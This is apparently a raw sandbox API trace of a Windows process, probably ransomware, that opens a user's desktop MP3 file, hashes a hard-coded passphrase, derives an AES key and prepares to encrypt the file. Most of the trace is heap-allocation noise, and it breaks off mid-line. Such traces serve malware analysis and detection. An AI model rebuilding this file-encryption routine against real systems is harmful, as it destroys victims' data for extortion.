RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.484] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0118.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.485] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.485] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\2v n4wbrbu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.487] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9b90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.487] CloseHandle (hObject=0x2a0) returned 1 [0118.498] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.499] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0118.499] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31429790, ftCreationTime.dwHighDateTime=0x1d5ee80, ftLastAccessTime.dwLowDateTime=0x354fc030, ftLastAccessTime.dwHighDateTime=0x1d5e942, ftLastWriteTime.dwLowDateTime=0x354fc030, ftLastWriteTime.dwHighDateTime=0x1d5e942, nFileSizeHigh=0x0, nFileSizeLow=0x775e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="2V N4wBRBU.mp3", cAlternateFileName="2VN4WB~1.MP3")) returned 0x41ac2c0 [0118.499] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0118.499] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0118.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.499] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.500] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.500] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.500] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.501] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.501] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.501] CryptHashData (hHash=0x41ac700, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.501] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.501] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0118.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.502] CryptDestroyHash (hHash=0x41ac700) returned 1 [0118.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\2v n4wbrbu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0118.502] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.502] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0118.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.502] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0118.503] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0118.503] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.504] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 